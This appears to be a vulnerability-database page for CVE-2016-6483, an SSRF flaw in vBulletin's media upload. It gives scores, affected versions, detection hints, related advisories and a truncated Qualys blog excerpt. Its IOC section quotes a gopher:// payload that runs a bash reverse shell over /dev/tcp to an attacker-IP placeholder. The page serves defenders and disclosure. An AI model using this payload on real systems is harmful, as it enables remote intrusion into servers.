CVE-2016-6483
published 2016-09-02CVE-2016-6483: The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6…
PriorityP263high8.6CVSS 3.0
AVNACLPRNUINSCCNIHAN
EXPLOIT
EPSS
11.95%
95.6th percentile
The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6, 4.2.3 before Patch Level 2, 5.x before 5.2.0 Patch Level 3, 5.2.1 before Patch Level 1, and 5.2.2 before Patch Level 1 allows remote attackers to conduct SSRF attacks via a crafted URL that results in a Redirection HTTP status code.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | <= 5.2.6 | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandgopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/<our_ext_ip>/<shell_port> 0<&1 2>&1 &') ; sleep 2s]↗
- →Monitor POST requests to the vBulletin endpoint /link/getlinkdata containing a 'url' parameter pointing to an external or internal IP/host, which is the vector for SSRF exploitation. ↗
- →Detect SSRF exploitation attempts where the server follows HTTP 301 redirects to internal gopher:// or telnet:// URIs targeting localhost services (e.g., Zabbix Agent on port 10050). ↗
- →Alert on vBulletin server-initiated outbound connections to attacker-controlled hosts on port 8080 (default reverse shell callback port used by the PoC exploit). ↗
- →The exploit requires the attacker's HTTP redirector to be reachable on port 80 or 443; detect vBulletin making outbound HTTP/HTTPS requests to external IPs as part of media-file URL fetching. ↗
- →A POST request to /link/getlinkdata with no or empty 'url' parameter returns the string 'invalid_url'; use this as a fingerprinting check for vulnerable vBulletin instances. ↗
- ·The exploit's HTTP redirector must listen on port 80 or 443 to be accepted by vBulletin's media-upload URL validation; other ports will be rejected. ↗
- ·The default port scan range in the PoC is 20–90; attackers may extend this to 65535 for a full internal port scan. ↗
CVSS provenance
nvdv3.08.6HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-54rx-pqvg-4w6x: The media-file upload feature in vBulletin before 3
ghsa_unreviewed·2022-05-17
CVE-2016-6483 [HIGH] CWE-918 GHSA-54rx-pqvg-4w6x: The media-file upload feature in vBulletin before 3
The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6, 4.2.3 before Patch Level 2, 5.x before 5.2.0 Patch Level 3, 5.2.1 before Patch Level 1, and 5.2.2 before Patch Level 1 allows remote attackers to conduct SSRF attacks via a crafted URL that results in a Redirection HTTP status code.
GHSA
GHSA-xc4w-h9rq-68jx: In vBulletin before 5
ghsa_unreviewed·2022-05-17·CVSS 8.6
CVE-2017-7569 [HIGH] CWE-918 GHSA-xc4w-h9rq-68jx: In vBulletin before 5
In vBulletin before 5.3.0, remote attackers can bypass the CVE-2016-6483 patch and conduct SSRF attacks by leveraging the behavior of the PHP parse_url function, aka VBV-17037.
No detection rules found.
Qualys
Hackers Are Having a Field Day with Stolen Credentials
blogs_qualys·2017-01-10
Hackers Are Having a Field Day with Stolen Credentials
Login credentials have always been a weak link in cybersecurity’s protection chain, a situation that’s worsening. However, this trend could be reversed with a bit of effort from end users, website owners and software vendors.
## 2016: The Year of Stolen Credentials
Hackers made hay of the sorry state of credential security in 2016. They stole millions of username and password combinations from online services of all shapes and sizes. Blogs and discussion forums were hit particularly hard.
Exploiting credentials is an old attack vector that still works wonders for hackers. In its 2016 Data Breach Investigations Report (DBIR), Verizon added a section about credentials, revealing that 63% of data breaches involved weak, default or stolen passwords.
“This statistic drives our recommendatio
Qualys
Hackers Are Having a Field Day with Stolen Credentials | Qualys
blogs_qualys·2017-01-10
Hackers Are Having a Field Day with Stolen Credentials | Qualys
Login credentials have always been a weak link in cybersecurity’s protection chain, a situation that’s worsening. However, this trend could be reversed with a bit of effort from end users, website owners and software vendors.
### 2016: The Year of Stolen Credentials
Hackers made hay of the sorry state of credential security in 2016. They stole millions of username and password combinations from online services of all shapes and sizes. Blogs and discussion forums were hit particularly hard.
Exploiting credentials is an old attack vector that still works wonders for hackers. In its 2016 Data Breach Investigations Report (DBIR), Verizon added a section about credentials, revealing that 63% of data breaches involved weak, default or stolen passwords.
“This statistic drives our recommendati
http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txthttp://www.securityfocus.com/bid/92350http://www.securitytracker.com/id/1036553http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-betahttp://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-betahttp://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2https://www.exploit-db.com/exploits/40225/http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txthttp://www.securityfocus.com/bid/92350http://www.securitytracker.com/id/1036553http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-betahttp://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-betahttp://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2https://www.exploit-db.com/exploits/40225/
2016-09-02
Published